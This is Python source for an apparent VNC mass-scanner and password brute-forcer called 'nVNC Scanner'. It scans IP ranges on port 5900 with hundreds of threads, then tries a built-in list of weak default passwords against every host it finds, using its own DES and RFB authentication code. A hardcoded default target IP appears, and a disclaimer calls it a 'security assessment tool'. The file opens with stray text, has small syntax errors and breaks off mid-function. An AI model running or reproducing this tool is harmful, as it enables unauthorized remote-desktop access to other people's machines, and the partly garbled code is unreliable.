uiuiuiuiuiu

import sys
import os
import cmd
import socket
import threading
import pickle
import time

from sys import stdout
from struct import pack, unpack

VERSION = "0x203"
CODENAME = "CheesePizza"
DEFAULT_CONFIG = dict()
CONFIG = dict()
FILES = dict()
FOLDERS = dict()
DISCLAIMER = """

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This is not a hacking tool, this is a security assessment tool.
We do not encourage cracking or any other illicit activities that
put in danger the privacy or the informational integrity of others,
and we certainly do not want this tool to be misused.
!!! USE IT AT YOUR OWN RISK !!!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


"""

DEFAULT_PASSWORDS = """1
12
123
1212
1234
12345
102030
112233
114477
123123
123456
159159
159357
332211
357951
1234567
1478963
...
"""

#============DEFAULT_CONFIG============#
DEFAULT_CONFIG['scan_range'] = "192.168.*.*"
DEFAULT_CONFIG['scan_port'] = "5900"
DEFAULT_CONFIG['scan_timeout'] = "5"
DEFAULT_CONFIG['scan_threads'] = "500"
DEFAULT_CONFIG['brute_threads'] = "250"
DEFAULT_CONFIG['brute_timeout'] = "5"
DEFAULT_CONFIG['auto_save'] = "true"
DEFAULT_CONFIG['auto_brute'] = "true"
#============DEFAULT_CONFIG============#

#============FILES============#
FILES['results'] = {"folder": "output", "name":"results.txt"}
FILES['ips'] = {"folder": "output", "name":"ips.txt"}
FILES['passwords'] = {"folder": "input", "name":"passwords.txt"}
FILES['config'] = {"folder": "nbin", "name":"config.conf"}
FILES['ips.tmp'] = {"folder": "nbin", "name":"ips.tmp"}
#============FILES============#

#============FOLDERS============#
FOLDERS['output'] = "output"
FOLDERS['input'] = "input"
FOLDERS['nbin'] = "bin"
#============FOLDERS============#

class _baseDes(object):
	def __init__(self, mode=0, IV=None, pad=None, padmode=1):
		if IV:
			IV = self._guardAgainstUnicode(IV)
		if pad:
			pad = self._guardAgainstUnicode(pad)
		self.block_size = 8
		if pad and padmode == 2:
			raise ValueError("Cannot use a pad character with 2")
		if IV and len(IV) != self.block_size:
			raise ValueError("Invalid Initial Value (IV), must be a multiple of " + str(self.block_size) + " bytes")

		self._mode = mode
		self._iv = IV
		self._padding = pad
		self._padmode = padmode

	def getKey(self):
		"""getKey() -> bytes"""
		return self.__key

	def setKey(self, key):
		"""Will set the crypting key for this object."""
		key = self._guardAgainstUnicode(key)
		self.__key = key

	def getMode(self):
		"""getMode() -> pyDes.ECB or pyDes.1"""
		return self._mode

	def setMode(self, mode):
		"""Sets the type of crypting mode, pyDes.ECB or pyDes.1"""
		self._mode = mode

	def getPadding(self):
		"""getPadding() -> bytes of length 1. Padding character."""
		return self._padding

	def setPadding(self, pad):
		"""setPadding() -> bytes of length 1. Padding character."""
		if pad is not None:
			pad = self._guardAgainstUnicode(pad)
		self._padding = pad

	def getPadMode(self):
		"""getPadMode() -> pyDes.1 or pyDes.2"""
		return self._padmode

	def setPadMode(self, mode):
		"""Sets the type of padding mode, pyDes.1 or pyDes.2"""
		self._padmode = mode

	def getIV(self):
		"""getIV() -> bytes"""
		return self._iv

	def setIV(self, IV):
		"""Will set the Initial Value, used in conjunction with 1 mode"""
		if not IV or len(IV) != self.block_size:
			raise ValueError("Invalid Initial Value (IV), must be a multiple of " + str(self.block_size) + " bytes")
		IV = self._guardAgainstUnicode(IV)
		self._iv = IV

	def _padData(self, data, pad, padmode):
		if padmode is None:
			padmode = self.getPadMode()
		if pad and padmode == 2:
			raise ValueError("Cannot use a pad character with 2")

		if padmode == 1:
			if len(data) % self.block_size == 0:
				return data

			if not pad:
				pad = self.getPadding()
			if not pad:
				raise ValueError("Data must be a multiple of " + str(self.block_size) + " bytes in length. Use padmode=2 or set the pad character.")
			data += (self.block_size - (len(data) % self.block_size)) * pad

		elif padmode == 2:
			pad_len = 8 - (len(data) % self.block_size)
			if sys.version_info[0] < 3:
				data += pad_len * chr(pad_len)
			else:
				data += bytes([pad_len] * pad_len)

		return data

	def _unpadData(self, data, pad, padmode):
		# Unpad data depending on the mode.
		if not data:
			return data
		if pad and padmode == 2:
			raise ValueError("Cannot use a pad character with 2")
		if padmode is None:
			# Get the default padding mode.
			padmode = self.getPadMode()

		if padmode == 1:
			if not pad:
				pad = self.getPadding()
			if pad:
				data = data[:-self.block_size] + \
				       data[-self.block_size:].rstrip(pad)

		elif padmode == 2:
			if sys.version_info[0] < 3:
				pad_len = ord(data[-1])
			else:
				pad_len = data[-1]
			data = data[:-pad_len]

		return data

	def _guardAgainstUnicode(self, data):
		if sys.version_info[0] < 3:
			if isinstance(data, unicode):
				raise ValueError("pyDes can only work with bytes, not Unicode strings.")
		else:
			if isinstance(data, str):
				try:
					return data.encode('ascii')
				except UnicodeEncodeError:
					pass
				raise ValueError("pyDes can only work with encoded strings, not Unicode.")
		return data

class des(_baseDes):
	__pc1 = [56, 48, 40, 32, 24, 16,  8,
		  0, 57, 49, 41, 33, 25, 17,
		  9,  1, 58, 50, 42, 34, 26,
		 18, 10,  2, 59, 51, 43, 35,
		 62, 54, 46, 38, 30, 22, 14,
		  6, 61, 53, 45, 37, 29, 21,
		 13,  5, 60, 52, 44, 36, 28,
		 20, 12,  4, 27, 19, 11,  3
	]

	__left_rotations = [
		1, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 1
	]

	__pc2 = [
		13, 16, 10, 23,  0,  4,
		 2, 27, 14,  5, 20,  9,
		22, 18, 11,  3, 25,  7,
		15,  6, 26, 19, 12,  1,
		40, 51, 30, 36, 46, 54,
		29, 39, 50, 44, 32, 47,
		43, 48, 38, 55, 33, 52,
		45, 41, 49, 35, 28, 31
	]

	__ip = [57, 49, 41, 33, 25, 17, 9,  1,
		59, 51, 43, 35, 27, 19, 11, 3,
		61, 53, 45, 37, 29, 21, 13, 5,
		63, 55, 47, 39, 31, 23, 15, 7,
		56, 48, 40, 32, 24, 16, 8,  0,
		58, 50, 42, 34, 26, 18, 10, 2,
		60, 52, 44, 36, 28, 20, 12, 4,
		62, 54, 46, 38, 30, 22, 14, 6
	]

	__expansion_table = [
		31,  0,  1,  2,  3,  4,
		 3,  4,  5,  6,  7,  8,
		 7,  8,  9, 10, 11, 12,
		11, 12, 13, 14, 15, 16,
		15, 16, 17, 18, 19, 20,
		19, 20, 21, 22, 23, 24,
		23, 24, 25, 26, 27, 28,
		27, 28, 29, 30, 31,  0
	]

	__sbox = [
		[14, 4, 13, 1, 2, 15, 11, 8, 3, 10, 6, 12, 5, 9, 0, 7,
		 0, 15, 7, 4, 14, 2, 13, 1, 10, 6, 12, 11, 9, 5, 3, 8,
		 4, 1, 14, 8, 13, 6, 2, 11, 15, 12, 9, 7, 3, 10, 5, 0,
		 15, 12, 8, 2, 4, 9, 1, 7, 5, 11, 3, 14, 10, 0, 6, 13],

		[15, 1, 8, 14, 6, 11, 3, 4, 9, 7, 2, 13, 12, 0, 5, 10,
		 3, 13, 4, 7, 15, 2, 8, 14, 12, 0, 1, 10, 6, 9, 11, 5,
		 0, 14, 7, 11, 10, 4, 13, 1, 5, 8, 12, 6, 9, 3, 2, 15,
		 13, 8, 10, 1, 3, 15, 4, 2, 11, 6, 7, 12, 0, 5, 14, 9],

		# S3
		[10, 0, 9, 14, 6, 3, 15, 5, 1, 13, 12, 7, 11, 4, 2, 8,
		 13, 7, 0, 9, 3, 4, 6, 10, 2, 8, 5, 14, 12, 11, 15, 1,
		 13, 6, 4, 9, 8, 15, 3, 0, 11, 1, 2, 12, 5, 10, 14, 7,
		 1, 10, 13, 0, 6, 9, 8, 7, 4, 15, 14, 3, 11, 5, 2, 12],

		# S4
		[7, 13, 14, 3, 0, 6, 9, 10, 1, 2, 8, 5, 11, 12, 4, 15,
		 13, 8, 11, 5, 6, 15, 0, 3, 4, 7, 2, 12, 1, 10, 14, 9,
		 10, 6, 9, 0, 12, 11, 7, 13, 15, 1, 3, 14, 5, 2, 8, 4,
		 3, 15, 0, 6, 10, 1, 13, 8, 9, 4, 5, 11, 12, 7, 2, 14],

		# S5
		[2, 12, 4, 1, 7, 10, 11, 6, 8, 5, 3, 15, 13, 0, 14, 9,
		 14, 11, 2, 12, 4, 7, 13, 1, 5, 0, 15, 10, 3, 9, 8, 6,
		 4, 2, 1, 11, 10, 13, 7, 8, 15, 9, 12, 5, 6, 3, 0, 14,
		 11, 8, 12, 7, 1, 14, 2, 13, 6, 15, 0, 9, 10, 4, 5, 3],

		# S6
		[12, 1, 10, 15, 9, 2, 6, 8, 0, 13, 3, 4, 14, 7, 5, 11,
		 10, 15, 4, 2, 7, 12, 9, 5, 6, 1, 13, 14, 0, 11, 3, 8,
		 9, 14, 15, 5, 2, 8, 12, 3, 7, 0, 4, 10, 1, 13, 11, 6,
		 4, 3, 2, 12, 9, 5, 15, 10, 11, 14, 1, 7, 6, 0, 8, 13],

		# S7
		[4, 11, 2, 14, 15, 0, 8, 13, 3, 12, 9, 7, 5, 10, 6, 1,
		 13, 0, 11, 7, 4, 9, 1, 10, 14, 3, 5, 12, 2, 15, 8, 6,
		 1, 4, 11, 13, 12, 3, 7, 14, 10, 15, 6, 8, 0, 5, 9, 2,
		 6, 11, 13, 8, 1, 4, 10, 7, 9, 5, 0, 15, 14, 2, 3, 12],

		# S8
		[13, 2, 8, 4, 6, 15, 11, 1, 10, 9, 3, 14, 5, 0, 12, 7,
		 1, 15, 13, 8, 10, 3, 7, 4, 12, 5, 6, 11, 0, 14, 9, 2,
		 7, 11, 4, 1, 9, 12, 14, 2, 0, 6, 10, 13, 15, 3, 5, 8,
		 2, 1, 14, 7, 4, 10, 8, 13, 15, 12, 9, 0, 3, 5, 6, 11],
	]

	__p = [
		15, 6, 19, 20, 28, 11,
		27, 16, 0, 14, 22, 25,
		4, 17, 30, 9, 1, 7,
		23,13, 31, 26, 2, 8,
		18, 12, 29, 5, 21, 10,
		3, 24
	]

	__fp = [
		39,  7, 47, 15, 55, 23, 63, 31,
		38,  6, 46, 14, 54, 22, 62, 30,
		37,  5, 45, 13, 53, 21, 61, 29,
		36,  4, 44, 12, 52, 20, 60, 28,
		35,  3, 43, 11, 51, 19, 59, 27,
		34,  2, 42, 10, 50, 18, 58, 26,
		33,  1, 41,  9, 49, 17, 57, 25,
		32,  0, 40,  8, 48, 16, 56, 24
	]

	ENCRYPT =	0x00
	DECRYPT =	0x01

	def __init__(self, key, mode=0, IV=None, pad=None, padmode=1):
		if len(key) != 8:
			raise ValueError("Invalid DES key size. Key must be exactly 8 bytes long.")
		_baseDes.__init__(self, mode, IV, pad, padmode)
		self.key_size = 8

		self.L = []
		self.R = []
		self.Kn = [ [0] * 48 ] * 16	# 16 48-bit keys (K1 - K16)
		self.final = []

		self.setKey(key)

	def setKey(self, key):
		"""Will set the crypting key for this object. Must be 8 bytes."""
		_baseDes.setKey(self, key)
		self.__create_sub_keys()

	def __String_to_BitList(self, data):
		"""Turn the string data, into a list of bits (1, 0)'s"""
		if sys.version_info[0] < 3:
			data = [ord(c) for c in data]
		l = len(data) * 8
		result = [0] * l
		pos = 0
		for ch in data:
			i = 7
			while i >= 0:
				if ch & (1 << i) != 0:
					result[pos] = 1
				else:
					result[pos] = 0
				pos += 1
				i -= 1

		return result

	def __BitList_to_String(self, data):
		"""Turn the list of bits -> data, into a string"""
		result = []
		pos = 0
		c = 0
		while pos < len(data):
			c += data[pos] << (7 - (pos % 8))
			if (pos % 8) == 7:
				result.append(c)
				c = 0
			pos += 1

		if sys.version_info[0] < 3:
			return ''.join([ chr(c) for c in result ])
		else:
			return bytes(result)

	def __permutate(self, table, block):
		"""Permutate this block with the specified table"""
		return list(map(lambda x: block[x], table))

	def __create_sub_keys(self):
		"""Create the 16 subkeys K[1] to K[16] from the given key"""
		key = self.__permutate(des.__pc1, self.__String_to_BitList(self.getKey()))
		i = 0
		self.L = key[:28]
		self.R = key[28:]
		while i < 16:
			j = 0
			while j < des.__left_rotations[i]:
				self.L.append(self.L[0])
				del self.L[0]

				self.R.append(self.R[0])
				del self.R[0]

				j += 1

			self.Kn[i] = self.__permutate(des.__pc2, self.L + self.R)

			i += 1

	def __des_crypt(self, block, crypt_type):
		"""Crypt the block of data through DES bit-manipulation"""
		block = self.__permutate(des.__ip, block)
		self.L = block[:32]
		self.R = block[32:]

		# Encryption starts from Kn[1] through to Kn[16]
		if crypt_type == des.ENCRYPT:
			iteration = 0
			iteration_adjustment = 1
		# Decryption starts from Kn[16] down to Kn[1]
		else:
			iteration = 15
			iteration_adjustment = -1

		i = 0
		while i < 16:
			# Make a copy of R[i-1], this will later become L[i]
			tempR = self.R[:]

			# Permutate R[i - 1] to start creating R[i]
			self.R = self.__permutate(des.__expansion_table, self.R)

			# Exclusive or R[i - 1] with K[i], create B[1] to B[8] whilst here
			self.R = list(map(lambda x, y: x ^ y, self.R, self.Kn[iteration]))
			B = [self.R[:6], self.R[6:12], self.R[12:18], self.R[18:24], self.R[24:30], self.R[30:36], self.R[36:42], self.R[42:]]
			j = 0
			Bn = [0] * 32
			pos = 0
			while j < 8:
				m = (B[j][0] << 1) + B[j][5]
				n = (B[j][1] << 3) + (B[j][2] << 2) + (B[j][3] << 1) + B[j][4]

				v = des.__sbox[j][(m << 4) + n]

				Bn[pos] = (v & 8) >> 3
				Bn[pos + 1] = (v & 4) >> 2
				Bn[pos + 2] = (v & 2) >> 1
				Bn[pos + 3] = v & 1

				pos += 4
				j += 1

			self.R = self.__permutate(des.__p, Bn)
			self.R = list(map(lambda x, y: x ^ y, self.R, self.L))
			self.L = tempR

			i += 1
			iteration += iteration_adjustment

		self.final = self.__permutate(des.__fp, self.R + self.L)
		return self.final

	def crypt(self, data, crypt_type):
		"""Crypt the data in blocks, running it through des_crypt()"""

		if not data:
			return ''
		if len(data) % self.block_size != 0:
			if crypt_type == des.DECRYPT:
				raise ValueError("Invalid data length, data must be a multiple of " + str(self.block_size) + " bytes\n.")
			if not self.getPadding():
				raise ValueError("Invalid data length, data must be a multiple of " + str(self.block_size) + " bytes\n. Try setting the optional padding character")
			else:
				data += (self.block_size - (len(data) % self.block_size)) * self.getPadding()

		if self.getMode() == 1:
			if self.getIV():
				iv = self.__String_to_BitList(self.getIV())
			else:
				raise ValueError("For 1 mode, you must supply the Initial Value (IV) for ciphering")
		i = 0
		dict = {}
		result = []
		while i < len(data):

			block = self.__String_to_BitList(data[i:i+8])

			if self.getMode() == 1:
				if crypt_type == des.ENCRYPT:
					block = list(map(lambda x, y: x ^ y, block, iv))
				processed_block = self.__des_crypt(block, crypt_type)

				if crypt_type == des.DECRYPT:
					processed_block = list(map(lambda x, y: x ^ y, processed_block, iv))
					iv = block
				else:
					iv = processed_block
			else:
				processed_block = self.__des_crypt(block, crypt_type)

			result.append(self.__BitList_to_String(processed_block))
			i += 8

		if sys.version_info[0] < 3:
			return ''.join(result)
		else:
			return bytes.fromhex('').join(result)

	def encrypt(self, data, pad=None, padmode=None):
		data = self._guardAgainstUnicode(data)
		if pad is not None:
			pad = self._guardAgainstUnicode(pad)
		data = self._padData(data, pad, padmode)
		return self.crypt(data, des.ENCRYPT)

	def decrypt(self, data, pad=None, padmode=None):
		data = self._guardAgainstUnicode(data)
		if pad is not None:
			pad = self._guardAgainstUnicode(pad)
		data = self.crypt(data, des.DECRYPT)
		return self._unpadData(data, pad, padmode)

class RFBProtocol:
	def __init__(self, host="69.193.118.223", password="1212", port=5901, timeout=5, shared=1):
		self.host = str(host)
		self.port = int(port)
		self.password = str(password)
		self.timeout = float(timeout)
		self.shared = int(shared)
		self.sock = None
		self.connected = False
		self.RFB = False
		self.null = False
		self.version = None
		self.name = None
		self.fail_message = None

	def connect(self):
		try:
			self.conn_init()
			self.client_auth()
		except Exception as ex:
			pass

	def close(self):
		self.sock.close()

	def conn_init(self):
		self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		self.sock.settimeout(self.timeout)
		self.sock.connect((self.host, self.port))
		result = self.sock.recv(12)
		if result[:3] == "RFB":
			self.RFB = True
			self.sock.send("RFB 003.003\n")
		else:
			raise Exception("Not RFB")

	def client_auth(self):
		result = self.sock.recv(4)
		(method,) = unpack("!I", result)
		if method == 0:
			(lenght,) = unpack("!I", self.sock.recv(4))
			self.fail_message = self.sock.recv(int(lenght))
			raise Exception(self.fail_message)
		elif method == 1:
			self.null = True
			self.client_init()
		elif method == 2:
			self.vnc_auth()
		else:
			raise Exception("Unsupported auth method")


	def vnc_auth(self):
		challenge = self.sock.recv(16)
		self.send_password(challenge)
		(result,) = unpack("!I", self.sock.recv(4))
		self.status_code = result
		if result == 0:
			self.client_init()
		elif result == 1:
			raise Exception("WRONG PASSWORD")

	def client_init(self):
		self.connected = True
		self.sock.send(pack("!B", self.shared))
		result = self.sock.recv(24)
		(width, height, pixformat, namelen) = unpack("!HH16sI", result)
		self.name = self.sock.recv(namelen)

	def send_password(self, challenge):
		password = (self.password + '\0' * 8)[:8]
		response = self.des_enc(password, challenge)
		self.sock.send(response)

	def des_enc(self, key, string):
		newkey = []
		for ki in range(len(key)):
			bsrc = ord(key[ki])
			btgt = 0
			for i in range(8):
				if bsrc & (1 << i):
					btgt = btgt | (1 << 7-i)
			newkey.append(chr(btgt))
		DES = des("".join(newkey))
		return DES.encrypt(string)

class MiscFunctions:

	def is_int(self, string):
		try:
			int(string)
			return True
		except ValueError:
			return False

	def is_float(self, string):
		try:
			float(string)
			return True
		except ValueError:
			return False

	def is_bool(self, string):
		if string.lower() in ("true", "false"):
			return True
		else:
			return False

	def save_config(self):
		Files.file_write(FILES['config'], pickle.dumps(CONFIG))

class FilesHandler:

	def __init__(self):
		self.sep = os.sep
		self.root_path = os.getcwd() + self.sep

	def file_get_contents(self, location):
		if self.file_exists(location):
			return open(location).read()
		else:
			return False

	def file_write(self, location, data="", mode="w"):
		if mode=="i":
			oldf = open(location).read()
			f = open(location, 'w')
			f.write(data.rstrip() + '\n' + oldf.rstrip())
			f.close()
		else:
			f = open(location, mode)
			f.write(data)
			f.close()

	def file_empty(self, location):
		try:
			if os.path.getsize(location) > 0:
				return False
			else:
				return True
		except OSError:
			return True

	def file_exists(self, file_path):
		return os.path.isfile(file_path)

	def dir_exists(self, dir_path):
		if os.path.exists(dir_path) and (not os.path.isfile(dir_path)):
			return True
		else:
			return False

	def dirname(self, path):
		return os.path.dirname(path)

	def mkdir(self, path):
		try:
			os.makedirs(path)
		except OSError:
			passlist

class Deploy:
	def __init__(self):
		self.deploy_folders()
		self.deploy_files()

	def deploy_folders(self):
		for (key, folder) in FOLDERS.items():
			folder = Files.root_path + folder + Files.sep
			FOLDERS[key] = folder
			if not Files.dir_exists(folder):
				Files.mkdir(folder)

	def deploy_files(self):
		for (key, file) in FILES.items():
			file = FOLDERS[file['folder']] + file['name']
			FILES[key] = file
			if not Files.file_exists(file):
				Files.file_write(file)

		if Files.file_empty(FILES['config']):
			Files.file_write(FILES['config'], pickle.dumps(DEFAULT_CONFIG))

		if Files.file_empty(FILES['passwords']):
			Files.file_write(FILES['passwords'], DEFAULT_PASSWORDS)


class Display:
	def __init__(self):
		pass

	def delimiter(self, string):
		stdout.write("\n" + ("-" * len(string)) + "\n")


	def getTerminalSize(self):
		current_os = os.name
		tuple_xy=None
		if current_os in ('nt','dos','ce'):
			tuple_xy = self._getTerminalSize_windows()
			if tuple_xy is None:
				tuple_xy = self._getTerminalSize_tput()
		if current_os == 'posix':
			tuple_xy = self._getTerminalSize_linux()
		if tuple_xy is None:
			tuple_xy = (80, 25)
		return tuple_xy

	def _getTerminalSize_windows(self):
		res=None
		try:
			from ctypes import windll, create_string_buffer
			h = windll.kernel32.GetStdHandle(-12)
			csbi = create_string_buffer(22)
			res = windll.kernel32.GetConsoleScreenBufferInfo(h, csbi)
		except:
			return None
		if res:
			import struct
			(bufx, bufy, curx, cury, wattr,
			 left, top, right, bottom, maxx, maxy) = struct.unpack("hhhhHhhhhhh", csbi.raw)
			sizex = right - left + 1
			sizey = bottom - top + 1
			return sizex, sizey
		else:
			return None
	def _getTerminalSize_tput(self):
		try:
			import subprocess
			proc=subprocess.Popen(["tput", "cols"],stdin=subprocess.PIPE,stdout=subprocess.PIPE)
			output=proc.communicate(input=None)
			cols=int(output[0])
			proc=subprocess.Popen(["tput", "lines"],stdin=subprocess.PIPE,stdout=subprocess.PIPE)
			output=proc.communicate(input=None)
			rows=int(output[0])
			return (cols,rows)
		except:
			return None
	def _getTerminalSize_linux(self):
		def ioctl_GWINSZ(fd):
			try:
				import fcntl, termios, struct, os
				cr = struct.unpack('hh', fcntl.ioctl(fd, termios.TIOCGWINSZ,'1234'))
			except:
				return None
			return cr
		cr = ioctl_GWINSZ(0) or ioctl_GWINSZ(1) or ioctl_GWINSZ(2)
		if not cr:
			try:
				fd = os.open(os.ctermid(), os.O_RDONLY)
				cr = ioctl_GWINSZ(fd)
				os.close(fd)
			except:
				pass
		if not cr:
			try:
				cr = (env['LINES'], env['COLUMNS'])
			except:
				return None
		return int(cr[1]), int(cr[0])
	def posvals(self,val='x'):
		self.size = self.getTerminalSize()
		self.tx = self.size[0]
		self.ty = self.size[1]
		if val=='x':
			return self.tx
		else:
			return self.ty


	def clearscreen(self):
		if os.name in ("nt", "dos", "ce"):
			os.system("CLS")
		elif os.name == "posix":
			os.system("clear")
		else:
			stdout.write("\n"*150)
		self.banner()

	def banner(self):
		banner = list()
		banner.append("|>>>> - nVNC Scanner - %s - %s - <<<<|" % (VERSION, CODENAME))
		banner.append("Scan Threads: %s <-> Scan Timeout: %s <-> Scan Port: %s" % (CONFIG['scan_threads'], CONFIG['scan_timeout'], CONFIG['scan_port']))
		banner.append("Brute Threads: %s <-> Brute Timeout: %s <-> Auto Brute: %s" % (CONFIG['brute_threads'], CONFIG['brute_timeout'], CONFIG['auto_brute']))
		banner.append("Scan Range: %s <-> Auto Save: %s" % (CONFIG['scan_range'], CONFIG['auto_save']))
		stdout.write("\n")
		for line in banner:
			stdout.write(line.center(self.posvals()))
			if 'nVNC' in line:
				stdout.write('\n')
		stdout.write("\n\n")


	def disclaimer(self):
		for line in DISCLAIMER.split('\n'):
			stdout.write(line.center(self.posvals()))


class NetTools:

	def convert_ip(self, string):
		if self.is_ip(string.strip()):
			return [self.ip2int(string.strip())]
		else:
			return False

	def convert_range(self, string):
		if string.count('-') == 1:
			string = string.strip().split('-')
			if self.is_ip(string[0]) and self.is_ip(string[1]):
				string = [self.ip2int(x) for x in string]
				string.sort()
				return string

		elif string.count('*') in (1,2,3):
			if self.is_ip(string.replace('*', '0')):
				return [self.ip2int(string.replace('*', '0')), self.ip2int(string.replace('*', '255'))]
		else:

			return False

	def is_range(self, string):
		if string.count('-') == 1:
			string = string.strip().split('-')
			if self.is_ip(string[0]) and self.is_ip(string[1]):
				return True

		elif string.count('*') in (1,2,3):
			if self.is_ip(string.replace('*', '0')):
				return True
		else:
			return False

	def is_ip(self, address='0.0.0.0'):
		try:
			octets = address.split('.')
			if len(octets) == 4:
				ipAddr = "".join(octets)
				if ipAddr.isdigit():
					if (int(octets[0]) >= 0) and (int(octets[0]) <= 255):
						if (int(octets[1]) >= 0) and (int(octets[1]) <= 255):
							if (int(octets[2]) >= 0) and (int(octets[2]) <= 255):
								if (int(octets[3]) >= 0) and (int(octets[3]) <= 255):
									return True
		except IndexError:
			pass
		except ValueError:
			pass
		return False

	def ip2int(self, ip):
		ip = ip.split(".")
		return int("%02x%02x%02x%02x" % (int(ip[0]),int(ip[1]),int(ip[2]),int(ip[3])),16)

	def int2ip(self, integer):
		integer = "%08x" % (integer)
	   	return "%i.%i.%i.%i" % (int(integer[0:2],16),int(integer[2:4],16),int(integer[4:6],16),int(integer[6:8],16))

class Interface:

	def Start(self):
		self.main_console().cmdloop()

	class main_console(cmd.Cmd):
		prompt = ("+>").rstrip()
		ruler = "~"

		def default(self, line):
			stdout.write("\n\tNope.\n\n")

		#==========MISC COMMANDS==========#
		def do_disclaimer(self, line):
			Display.disclaimer()
		def do_add(self, line):
			line = line.lower().split(" ")
			if len(line) == 2 and line[0] and line[1]:
				if line[1] in FILES.keys():
					Files.file_write(FILES[line[1]], line[0], 'i')
					stdout.write("\n\t[OK]\n")
				else:
					stdout.write("\n\t[ERROR]\n")
			else:
				stdout.write("\n\t[ERROR]\n")
			time.sleep(0.5)
			Display.clearscreen()

		def do_flush(self, line):
			line = line.lower().split(" ")
			if len(line) == 1 and line[0]:
				if line[0] in FILES.keys():
					Files.file_write(FILES[line[0]])
					stdout.write("\n\t[OK]\n")
				elif line[0].strip() in ("all", "everything"):
					for file in FILES.keys():
						if file != "config":
							Files.file_write(FILES[file])
					stdout.write("\n\t[OK]\n")
			else:
				stdout.write("\n\t[ERROR]\n")
			time.sleep(0.5)
			Display.clearscreen()

		def do_clear(self, line):
			Display.clearscreen()
		def do_cls(self,line):
			self.do_clear(line)

		def do_exit(self, line):
			sys.exit("Bye.")
		def do_quit(self, line):
			self.do_exit(line)
		def do_q(self, line):
			self.do_exit(line)
		#==========MISC COMMANDS==========#


		#==========SCAN COMMAND===========#
		def do_scan(self, line):
			line = line.lower().split(" ")
			if len(line) == 1 and line[0] != "":
				if NetTools.is_range(line[0]):
					stdout.write("\n\t[OK]\n")
					CONFIG['scan_range'] = line[0]
				else:
					stdout.write("\n\t[ERROR]\n")
			stdout.write("\n")
			ScanEngine.Start()
		#==========SCAN COMMAND===========#


		#==========BRUTE COMMAND===========#
		def do_brute(self, line):
			stdout.write("\n")
			BruteEngine.Start()
		#==========BRUTE COMMAND===========#


		#==========SET COMMAND===========#
		def do_set(self, line):
			OK = False
			line = line.lower().split(" ")
			if len(line) == 2 and line[0] in CONFIG.keys():
				if line[0] == "scan_range" and NetTools.is_range(line[1]):
					OK = True
				elif line[0] in ("scan_threads", "brute_threads", "scan_port") and Misc.is_int(line[1]):
					OK = True
				elif line[0] in ("scan_timeout", "brute_timeout") and Misc.is_float(line[1]):
					OK = True
				elif line[0] in ("auto_brute", "auto_save") and Misc.is_bool(line[1]):
					OK = True

				if OK:
					CONFIG[line[0]] = line[1]
					stdout.write("\n\t[OK]\n")
				else:
					stdout.write("\n\t[ERROR]\n\n")
			else:
				stdout.write("\n\t[ERROR]\n\n")
			if CONFIG['auto_save'] == "true":
				Misc.save_config()

			time.sleep(0.5)
			Display.clearscreen()
		#==========SET COMMAND===========#


		#==========SHOW COMMAND===========#
		def do_show(self, line):
			line = line.lower()
			if line in ("results", "result", "brute"):
				stdout.write("\nBrute Results")
				Display.delimiter("Brute Results")
				for line in open(FILES['results'], 'r').readlines():
					if line.strip() != "":
						stdout.write("%s\n" % line.strip())
				Display.delimiter("Brute Results")
			elif line in ("ips", "scan", "ip"):
				stdout.write("\nScan Results")
				Display.delimiter("Scan Results")
				for line in open(FILES['ips'], 'r').readlines():
					if line.strip() != "":
						stdout.write("%s\n" % line.strip())
				Display.delimiter("Scan Results")
			elif line in ("password", "passwords", "pass"):
				stdout.write("\nPasswords")
				Display.delimiter("Passwords")
				for line in open(FILES['passwords'], 'r').readlines():
					if line.strip() != "":
						stdout.write("%s\n" % line.strip())
				Display.delimiter("Passwords")
			else:
				stdout.write("\nSettings")
				Display.delimiter("Settings")
				for (config, value) in CONFIG.items():
					stdout.write("%s = %s\n" % (config, value))
				Display.delimiter("Settings")
				stdout.write("\n")
		#==========SHOW COMMAND===========#

class ScanEngine:
	def __init__(self):
		pass

	def init(self):
		global lock, semaphore
		lock = threading.Lock()
		semaphore = threading.Semaphore(int(CONFIG['scan_threads']))
		self.ips_file = open(FILES['ips'], 'a', 0)
		self.current = 0
		self.found = 0
		self.range = NetTools.convert_range(CONFIG['scan_range'])
		self.total = int(self.range[1]) - int(self.range[0])

	def Start(self):
		self.init()

		output_thread = threading.Thread(target=self.output_thread, args=())
		output_thread.daemon = True
		output_thread.start()

		try:
			integer = self.range[0]
			while integer <= self.range[1]:
				semaphore.acquire()
				thread = threading.Thread(target=self.scan_thread, args=(integer,))
				thread.daemon=True
				thread.start()
				integer += 1
				self.current += 1
		except:
			stdout.flush()
			stdout.write("\n\tSome thread related error occured, try lowering the threads amount.\n")

		while threading.active_count() > 1:
			pass

		self.ips_file.close()

		if CONFIG['auto_brute'] == "true":
			BruteEngine.Start()
		else:
			stdout.write("\n\nDONE! Check \"output/ips.txt\" or type \"show ips\"!\n\n")


	def scan_thread(self, integer):
		try:
			sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
			sock.settimeout(float(CONFIG['scan_timeout']))
			sock.connect((NetTools.int2ip(integer), int(CONFIG['scan_port'])))
			lock.acquire()
			self.found += 1
			self.ips_file.write("%s:%i\n" % (NetTools.int2ip(integer), int(CONFIG['scan_port'])))
			lock.release()
		except:
			pass
		semaphore.release()


	def output_thread(self):
		try:
			while self.total >= self.current:
				time.sleep(0.5)
				stdout.flush()
				stdout.write("\r Current [%i/%i] Found: %i   " % (self.current, self.total, self.found))
		except:
			pass

class BruteEngine:

	def __init__(self):
		pass

	def init(self):
		global lock, semaphore
		lock = threading.Lock()
		semaphore = threading.Semaphore(int(CONFIG['brute_threads']))
		self.results = open(FILES['results'], 'a', 0)
		self.passwords = list()
		self.servers = list()
		self.current_password = None
		self.output_kill = False
		self.get_passwords()
		self.get_servers()

	def Start(self):
		self.init()
		if self.passwords is not False:
			if self.servers is not False:
				output_thread = threading.Thread(target=self.output_thread, args=())
				output_thread.daemon = True
				output_thread.start()
				for self.current_password in self.passwords:
					try:
						for server in self.servers:
							semaphore.acquire()
							thread = threading.Thread(target=self.brute_thread, args=( server, self.current_password ))
							thread.daemon=True
							thread.start()
					except:
						stdout.flush()
						stdout.write("\n\tSome thread related error occured, try lowering the threads amount.\n")

					while threading.active_count() > 2:
						pass
